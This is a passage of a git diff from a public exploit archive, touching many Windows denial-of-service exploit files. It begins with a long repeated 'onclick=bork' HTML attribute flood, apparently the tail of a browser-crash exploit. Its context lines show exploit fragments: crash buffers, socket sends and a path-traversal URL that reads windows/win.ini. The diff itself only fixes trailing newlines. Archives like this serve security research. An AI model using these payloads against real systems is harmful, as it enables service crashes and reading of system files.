onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork><p>Hello cruel world. -# milw0rm.com [2006-03-21] +# milw0rm.com [2006-03-21] \ No newline at end of file diff --git a/platforms/windows/dos/15986.py b/platforms/windows/dos/15986.py index 858a63cc9..9923464df 100755 --- a/platforms/windows/dos/15986.py +++ b/platforms/windows/dos/15986.py @@ -37,4 +37,4 @@ while counter <= 300: counter=counter+1 except: print "Check the service - probably dead!" - sys.exit() + sys.exit() \ No newline at end of file diff --git a/platforms/windows/dos/15988.py b/platforms/windows/dos/15988.py index fdf242370..ba01cac68 100755 --- a/platforms/windows/dos/15988.py +++ b/platforms/windows/dos/15988.py @@ -89,4 +89,4 @@ sock.connect(cs) sock.send(data) -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/windows/dos/1599.cpp b/platforms/windows/dos/1599.cpp index 36d873651..149cf0054 100755 --- a/platforms/windows/dos/1599.cpp +++ b/platforms/windows/dos/1599.cpp @@ -223,4 +223,4 @@ main(int argc, char **argv) return 0; } -// milw0rm.com [2006-03-21] +// milw0rm.com [2006-03-21] \ No newline at end of file diff --git a/platforms/windows/dos/15992.txt b/platforms/windows/dos/15992.txt index 061f8b821..04c67f6e6 100755 --- a/platforms/windows/dos/15992.txt +++ b/platforms/windows/dos/15992.txt @@ -104,4 +104,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp Version 2.07.01. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/16002.html b/platforms/windows/dos/16002.html index 148a566f5..921af1f89 100755 --- a/platforms/windows/dos/16002.html +++ b/platforms/windows/dos/16002.html @@ -16,4 +16,4 @@ exploit = arg1 target.SelectServer exploit ,arg2 -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/1601.c b/platforms/windows/dos/1601.c index 6fccff207..bde5b0edf 100755 --- a/platforms/windows/dos/1601.c +++ b/platforms/windows/dos/1601.c @@ -179,4 +179,4 @@ char * pszUnauthLinks( DWORD dwIndex ) return szGetReqH; } -// milw0rm.com [2006-03-22] +// milw0rm.com [2006-03-22] \ No newline at end of file diff --git a/platforms/windows/dos/16021.c b/platforms/windows/dos/16021.c index 38e662fa8..3540a1c93 100755 --- a/platforms/windows/dos/16021.c +++ b/platforms/windows/dos/16021.c @@ -96,6 +96,4 @@ int __cdecl main(int argc, char* argv[]) CloseHandle(hDevice); getch(); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/16022.c b/platforms/windows/dos/16022.c index 402795caf..bc52ca80f 100755 --- a/platforms/windows/dos/16022.c +++ b/platforms/windows/dos/16022.c @@ -260,6 +260,4 @@ int __cdecl main(int argc, char* argv[]) CloseHandle(hDevice); getch(); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/16023.c b/platforms/windows/dos/16023.c index d6408ddfd..f228f5deb 100755 --- a/platforms/windows/dos/16023.c +++ b/platforms/windows/dos/16023.c @@ -414,6 +414,4 @@ int __cdecl main(int argc, char* argv[]) CloseHandle(hDevice); getch(); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/1603.c b/platforms/windows/dos/1603.c index a0dae6df6..3cc64d194 100755 --- a/platforms/windows/dos/1603.c +++ b/platforms/windows/dos/1603.c @@ -159,4 +159,4 @@ unsigned short in_chksum(unsigned short *addr, int len) return(answer); } -// milw0rm.com [2006-03-22] +// milw0rm.com [2006-03-22] \ No newline at end of file diff --git a/platforms/windows/dos/16035.py b/platforms/windows/dos/16035.py index 0ae9793ca..09b477afe 100755 --- a/platforms/windows/dos/16035.py +++ b/platforms/windows/dos/16035.py @@ -20,4 +20,4 @@ s.send("HELO\r\n") s.send(buffer) s.send("HELP\r\n") -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/1604.html b/platforms/windows/dos/1604.html index 790ab5c1d..d9aa21013 100755 --- a/platforms/windows/dos/1604.html +++ b/platforms/windows/dos/1604.html @@ -16,4 +16,4 @@ WS2003: 6.0.3790.0 a=r.createTextRange(); </script> -# milw0rm.com [2006-03-22] +# milw0rm.com [2006-03-22] \ No newline at end of file diff --git a/platforms/windows/dos/16040.py b/platforms/windows/dos/16040.py index 479856b93..4d13a8015 100755 --- a/platforms/windows/dos/16040.py +++ b/platforms/windows/dos/16040.py @@ -64,4 +64,4 @@ conn.send(resp) print "--> %s\n"%resp.encode("hex") conn.close() -print "finished, check server" +print "finished, check server" \ No newline at end of file diff --git a/platforms/windows/dos/16084.html b/platforms/windows/dos/16084.html index ea62054f7..e90cac73c 100755 --- a/platforms/windows/dos/16084.html +++ b/platforms/windows/dos/16084.html @@ -52,4 +52,4 @@ window.location.replace("http://" + junk); <body> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/161.c b/platforms/windows/dos/161.c index a563e15bc..1e3c07e6c 100755 --- a/platforms/windows/dos/161.c +++ b/platforms/windows/dos/161.c @@ -188,4 +188,4 @@ exit(1); } -// milw0rm.com [2004-03-04] +// milw0rm.com [2004-03-04] \ No newline at end of file diff --git a/platforms/windows/dos/16120.py b/platforms/windows/dos/16120.py index f0639fff3..cfc98366e 100755 --- a/platforms/windows/dos/16120.py +++ b/platforms/windows/dos/16120.py @@ -36,4 +36,4 @@ try: except: print "File cannot be created" - + \ No newline at end of file diff --git a/platforms/windows/dos/16121.py b/platforms/windows/dos/16121.py index e9c490b10..03f76d4cc 100755 --- a/platforms/windows/dos/16121.py +++ b/platforms/windows/dos/16121.py @@ -26,4 +26,4 @@ except: - + \ No newline at end of file diff --git a/platforms/windows/dos/1613.c b/platforms/windows/dos/1613.c index 763ac9dc5..2e78454ae 100755 --- a/platforms/windows/dos/1613.c +++ b/platforms/windows/dos/1613.c @@ -534,4 +534,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2006-03-26] +// milw0rm.com [2006-03-26] \ No newline at end of file diff --git a/platforms/windows/dos/1614.c b/platforms/windows/dos/1614.c index e29642ee8..c1043bfed 100755 --- a/platforms/windows/dos/1614.c +++ b/platforms/windows/dos/1614.c @@ -446,4 +446,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2006-03-26] +// milw0rm.com [2006-03-26] \ No newline at end of file diff --git a/platforms/windows/dos/1615.txt b/platforms/windows/dos/1615.txt index af883e1f0..bcd2b6225 100755 --- a/platforms/windows/dos/1615.txt +++ b/platforms/windows/dos/1615.txt @@ -281,4 +281,4 @@ References ---------- Excel File Format Structure (http://sc.openoffice.org/excelfileformat.pdf) -# milw0rm.com [2006-03-27] +# milw0rm.com [2006-03-27] \ No newline at end of file diff --git a/platforms/windows/dos/16150.py b/platforms/windows/dos/16150.py index 0006e10d0..a35ce28e2 100755 --- a/platforms/windows/dos/16150.py +++ b/platforms/windows/dos/16150.py @@ -74,4 +74,4 @@ else: username=sys.argv[2] passwd=sys.argv[3] start(hostname,username,passwd) - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/16190.pl b/platforms/windows/dos/16190.pl index 884964ab6..eaa115b15 100755 --- a/platforms/windows/dos/16190.pl +++ b/platforms/windows/dos/16190.pl @@ -101,4 +101,4 @@ sub receive } } return $buf; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/16203.txt b/platforms/windows/dos/16203.txt index 2f41339c1..eb57548f8 100755 --- a/platforms/windows/dos/16203.txt +++ b/platforms/windows/dos/16203.txt @@ -102,4 +102,4 @@ open winmerge, ">./$project" || die "\nCan't open $project: $!"; print winmerge $begining.$load x(2391-142+1000).$ending; sleep 2; print "\n[*] File created successfully!\n\n"; -close winmerge; +close winmerge; \ No newline at end of file diff --git a/platforms/windows/dos/16230.py b/platforms/windows/dos/16230.py index fef4ddbb3..e8600ad68 100755 --- a/platforms/windows/dos/16230.py +++ b/platforms/windows/dos/16230.py @@ -100,5 +100,4 @@ try: except: print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n" - - + \ No newline at end of file diff --git a/platforms/windows/dos/16237.py b/platforms/windows/dos/16237.py index 4466cb6aa..241fc1964 100755 --- a/platforms/windows/dos/16237.py +++ b/platforms/windows/dos/16237.py @@ -78,4 +78,4 @@ try: f.close() print "File created" except: - print "File cannot be created" + print "File cannot be created" \ No newline at end of file diff --git a/platforms/windows/dos/16248.pl b/platforms/windows/dos/16248.pl index e22289e97..be81c95a9 100755 --- a/platforms/windows/dos/16248.pl +++ b/platforms/windows/dos/16248.pl @@ -70,4 +70,4 @@ my $data = ""; #my $data = "J" x(2+2); open($FILE,">$file"); print $FILE $data; close($FILE); -print "\npj File Created successfully\n"; +print "\npj File Created successfully\n"; \ No newline at end of file diff --git a/platforms/windows/dos/16260.py b/platforms/windows/dos/16260.py index 034282361..030b9d7bb 100755 --- a/platforms/windows/dos/16260.py +++ b/platforms/windows/dos/16260.py @@ -40,4 +40,4 @@ while(len(buffer)<200000): print "Dos in Login credentials \n" exit(-1) -Twitter:clshackblog +Twitter:clshackblog \ No newline at end of file diff --git a/platforms/windows/dos/16262.c b/platforms/windows/dos/16262.c index 94fab7b6a..11997a9ee 100755 --- a/platforms/windows/dos/16262.c +++ b/platforms/windows/dos/16262.c @@ -461,4 +461,4 @@ IOCTL_WMI_TRACE_MESSAGE, i, result); } printf("done!"); free(buff); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/1633.c b/platforms/windows/dos/1633.c index 928976a8f..6f4e589f2 100755 --- a/platforms/windows/dos/1633.c +++ b/platforms/windows/dos/1633.c @@ -48,4 +48,4 @@ int main() } -// milw0rm.com [2006-04-02] +// milw0rm.com [2006-04-02] \ No newline at end of file diff --git a/platforms/windows/dos/16365.rb b/platforms/windows/dos/16365.rb index 50222cde3..6df976ac7 100755 --- a/platforms/windows/dos/16365.rb +++ b/platforms/windows/dos/16365.rb @@ -469,4 +469,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/1642.c b/platforms/windows/dos/1642.c index 0dd45f7dd..593d7cb2d 100755 --- a/platforms/windows/dos/1642.c +++ b/platforms/windows/dos/1642.c @@ -231,4 +231,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2006-04-04] +// milw0rm.com [2006-04-04] \ No newline at end of file diff --git a/platforms/windows/dos/1643.c b/platforms/windows/dos/1643.c index f98b873d2..b18f45fd2 100755 --- a/platforms/windows/dos/1643.c +++ b/platforms/windows/dos/1643.c @@ -180,4 +180,4 @@ quit: } #endif -// milw0rm.com [2006-04-04] +// milw0rm.com [2006-04-04] \ No newline at end of file diff --git a/platforms/windows/dos/16790.rb b/platforms/windows/dos/16790.rb index 5b45849c3..79f642550 100755 --- a/platforms/windows/dos/16790.rb +++ b/platforms/windows/dos/16790.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/dos/1688.c b/platforms/windows/dos/1688.c index 58eb3d65a..1ffdbef18 100755 --- a/platforms/windows/dos/1688.c +++ b/platforms/windows/dos/1688.c @@ -101,4 +101,4 @@ if(host==INADDR_NONE) return host; } -// milw0rm.com [2006-04-17] +// milw0rm.com [2006-04-17] \ No newline at end of file diff --git a/platforms/windows/dos/16979.html b/platforms/windows/dos/16979.html index 3495f3222..8faa60406 100755 --- a/platforms/windows/dos/16979.html +++ b/platforms/windows/dos/16979.html @@ -27,4 +27,4 @@ </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/16986.py b/platforms/windows/dos/16986.py index 2db4bf67b..1f0f2464d 100755 --- a/platforms/windows/dos/16986.py +++ b/platforms/windows/dos/16986.py @@ -30,5 +30,4 @@ print "In order to DoS AVIPreview 0.26 Alpha execute following steps\n" print "1. Open file '" + path + "'in AVIPreview, application will show MessageBox with error, but will not crash" print "2. Select 'No', otherway AVIPreview will pop-up browser" print "3. Navigate to File menu and pick recent file (which point to our AVI file)" -print "4. You have DoS :>" - +print "4. You have DoS :>" \ No newline at end of file diff --git a/platforms/windows/dos/16996.rb b/platforms/windows/dos/16996.rb index 6ca77e771..07e8b9785 100755 --- a/platforms/windows/dos/16996.rb +++ b/platforms/windows/dos/16996.rb @@ -11,4 +11,4 @@ path = "c:\\a.wmv" #wmv/avi/flv/mpeg/mp4 f = open(path, "wb") f.write("\x41" * 1000) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/17.pl b/platforms/windows/dos/17.pl index d5203f6e9..5b3e77503 100755 --- a/platforms/windows/dos/17.pl +++ b/platforms/windows/dos/17.pl @@ -56,4 +56,4 @@ print "\n.:.:.:.:.:.:.:.:.:.:.:."; print "\ncrash was successful ~!\n"; print "\.:.:.:.:.:.:.:.:.:.:.:.\n"; -# milw0rm.com [2003-04-22] +# milw0rm.com [2003-04-22] \ No newline at end of file diff --git a/platforms/windows/dos/17021.py b/platforms/windows/dos/17021.py index 7f34e687d..68b024672 100755 --- a/platforms/windows/dos/17021.py +++ b/platforms/windows/dos/17021.py @@ -110,4 +110,4 @@ try: except: print "\t\t[+]Error connecting to Server\n" - sleep(1) + sleep(1) \ No newline at end of file diff --git a/platforms/windows/dos/17032.txt b/platforms/windows/dos/17032.txt index adfe6d838..737b9b746 100755 --- a/platforms/windows/dos/17032.txt +++ b/platforms/windows/dos/17032.txt @@ -63,4 +63,4 @@ Exception was not handled by user's code, so application was forced to close 78138A1E Main CALL DWORD PTR DS:[<&KERNEL32.GetCurrentProcess>]; FL=PS, EAX=FFFFFFFF 78138A24 Main PUSH EAX ; ESP=0012E4D4 78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70, - + \ No newline at end of file diff --git a/platforms/windows/dos/17033.py b/platforms/windows/dos/17033.py index d30b87f17..175e3813e 100755 --- a/platforms/windows/dos/17033.py +++ b/platforms/windows/dos/17033.py @@ -122,4 +122,4 @@ try: print "resp_2 = %s\n"%resp.encode("hex") except: pass -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/windows/dos/17045.py b/platforms/windows/dos/17045.py index e5775fd55..8d3a71d94 100755 --- a/platforms/windows/dos/17045.py +++ b/platforms/windows/dos/17045.py @@ -21,6 +21,4 @@ crash = "A" * 2000 print "Sending crash...." pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00" s.sendto(pwned, (host, port)) - - - + \ No newline at end of file diff --git a/platforms/windows/dos/17071.py b/platforms/windows/dos/17071.py index 7205dc3e8..b10d695d0 100755 --- a/platforms/windows/dos/17071.py +++ b/platforms/windows/dos/17071.py @@ -21,4 +21,4 @@ print "Done, 1 file generated on 'C:\\' ..." print "Play this file with GOM Player 2.1.28.5039 and enjoy ;)" - + \ No newline at end of file diff --git a/platforms/windows/dos/17072.py b/platforms/windows/dos/17072.py index 3de3a6d10..40119e550 100755 --- a/platforms/windows/dos/17072.py +++ b/platforms/windows/dos/17072.py @@ -25,4 +25,4 @@ f.close() print "Done, 1 file generated on 'C:\\' ..." print "Highlight (select) generated file in Explorer" -print "DoS is triggered when Explorer tries to render AVI file for preview" +print "DoS is triggered when Explorer tries to render AVI file for preview" \ No newline at end of file diff --git a/platforms/windows/dos/17074.py b/platforms/windows/dos/17074.py index de699538b..ee6a5d937 100755 --- a/platforms/windows/dos/17074.py +++ b/platforms/windows/dos/17074.py @@ -38,4 +38,4 @@ print "Done, 1 file generated on 'C:\\' ..." print "Play this file with Winamp 5.61 and enjoy ;)" - + \ No newline at end of file diff --git a/platforms/windows/dos/17075.py b/platforms/windows/dos/17075.py index 4c7a66d30..2c6c2021a 100755 --- a/platforms/windows/dos/17075.py +++ b/platforms/windows/dos/17075.py @@ -31,4 +31,4 @@ print "Done, 1 file generated on 'C:\\' ..." print "Play this file with Media Player Classic - Home Cinema 1.5.0.2827 and enjoy ;)" - + \ No newline at end of file diff --git a/platforms/windows/dos/1708.txt b/platforms/windows/dos/1708.txt index 5629a0043..c06391715 100755 --- a/platforms/windows/dos/1708.txt +++ b/platforms/windows/dos/1708.txt @@ -18,4 +18,4 @@ Author: Luigi Auriemma Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1708.zip (04232006-skulltagfs.zip) -# milw0rm.com [2006-04-23] +# milw0rm.com [2006-04-23] \ No newline at end of file diff --git a/platforms/windows/dos/17142.py b/platforms/windows/dos/17142.py index 11fff5aa2..d298e6b8f 100755 --- a/platforms/windows/dos/17142.py +++ b/platforms/windows/dos/17142.py @@ -42,4 +42,4 @@ print "Done, 1 file generated on 'C:\\' ..." print "Open this file in IrfanView 4.28 and enjoy ;)" - + \ No newline at end of file diff --git a/platforms/windows/dos/17143.py b/platforms/windows/dos/17143.py index e6537a22c..51e7c2ca3 100755 --- a/platforms/windows/dos/17143.py +++ b/platforms/windows/dos/17143.py @@ -42,4 +42,4 @@ print "Done, 1 file generated on 'C:\\' ..." print "Open this file in IrfanView 4.28 and enjoy ;)" - + \ No newline at end of file diff --git a/platforms/windows/dos/17145.pl b/platforms/windows/dos/17145.pl index 4efddcd1f..c30af003b 100755 --- a/platforms/windows/dos/17145.pl +++ b/platforms/windows/dos/17145.pl @@ -52,4 +52,4 @@ open(FILE,">$filename") || die "[-]Error:\n$!\n"; print FILE $zip; close(FILE); print "[+] ZIP File Created With Sucess:)\n"; -sleep(3); +sleep(3); \ No newline at end of file diff --git a/platforms/windows/dos/17159.txt b/platforms/windows/dos/17159.txt index 09a32554a..4d9f5919d 100755 --- a/platforms/windows/dos/17159.txt +++ b/platforms/windows/dos/17159.txt @@ -229,4 +229,4 @@ others] No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17160.txt b/platforms/windows/dos/17160.txt index 8513c4995..109397a8e 100755 --- a/platforms/windows/dos/17160.txt +++ b/platforms/windows/dos/17160.txt @@ -156,4 +156,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17161.txt b/platforms/windows/dos/17161.txt index 6e7815be7..4e5916905 100755 --- a/platforms/windows/dos/17161.txt +++ b/platforms/windows/dos/17161.txt @@ -137,4 +137,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17162.txt b/platforms/windows/dos/17162.txt index 2169cf979..74b050188 100755 --- a/platforms/windows/dos/17162.txt +++ b/platforms/windows/dos/17162.txt @@ -154,4 +154,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17163.txt b/platforms/windows/dos/17163.txt index 4b581a523..e347601a0 100755 --- a/platforms/windows/dos/17163.txt +++ b/platforms/windows/dos/17163.txt @@ -113,4 +113,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17164.txt b/platforms/windows/dos/17164.txt index 4fb09b009..b889de5b1 100755 --- a/platforms/windows/dos/17164.txt +++ b/platforms/windows/dos/17164.txt @@ -113,4 +113,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17188.txt b/platforms/windows/dos/17188.txt index 7768e508d..acad09cc9 100755 --- a/platforms/windows/dos/17188.txt +++ b/platforms/windows/dos/17188.txt @@ -225,4 +225,4 @@ sub abort } die "...\n"; } -sub usage +sub usage \ No newline at end of file diff --git a/platforms/windows/dos/1721.pl b/platforms/windows/dos/1721.pl index becb3a377..2c4b9e897 100755 --- a/platforms/windows/dos/1721.pl +++ b/platforms/windows/dos/1721.pl @@ -47,4 +47,4 @@ sub usage() exit(); } -# milw0rm.com [2006-04-27] +# milw0rm.com [2006-04-27] \ No newline at end of file diff --git a/platforms/windows/dos/17227.py b/platforms/windows/dos/17227.py index 166a7d71d..317efbca1 100755 --- a/platforms/windows/dos/17227.py +++ b/platforms/windows/dos/17227.py @@ -1234,5 +1234,4 @@ wD+="10000000000000" FILE = open('webDEViL-CVE-2011-0978.xls',"wb") backtobin=binascii.unhexlify(wD) FILE.write(backtobin) -FILE.close() - +FILE.close() \ No newline at end of file diff --git a/platforms/windows/dos/17266.txt b/platforms/windows/dos/17266.txt index 0a4901b8c..6f2a8dce5 100755 --- a/platforms/windows/dos/17266.txt +++ b/platforms/windows/dos/17266.txt @@ -55,4 +55,4 @@ exploited to read files outside of the web root. --PoC-- -http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows/win.ini +http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows/win.ini \ No newline at end of file diff --git a/platforms/windows/dos/17273.c b/platforms/windows/dos/17273.c index bf4bc8993..88eda6ac1 100755 --- a/platforms/windows/dos/17273.c +++ b/platforms/windows/dos/17273.c @@ -210,6 +210,4 @@ int __cdecl main(int argc, char* argv[]) CloseHandle(hDevice); getch(); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/17274.txt b/platforms/windows/dos/17274.txt index cea2876d8..957265b47 100755 --- a/platforms/windows/dos/17274.txt +++ b/platforms/windows/dos/17274.txt @@ -119,4 +119,4 @@ SlimPDF_Reader+0x00000000000419c4 (Hash=0x566e1f14.0x18331e13) User mode write access violations that are not near NULL are exploitable. -POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17274.poc.tar.gz +POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17274.poc.tar.gz \ No newline at end of file diff --git a/platforms/windows/dos/17278.pl b/platforms/windows/dos/17278.pl index 7e8ed5d00..ea6d57656 100755 --- a/platforms/windows/dos/17278.pl +++ b/platforms/windows/dos/17278.pl @@ -133,4 +133,4 @@ sleep(1); close (ses); -print "\n[*] 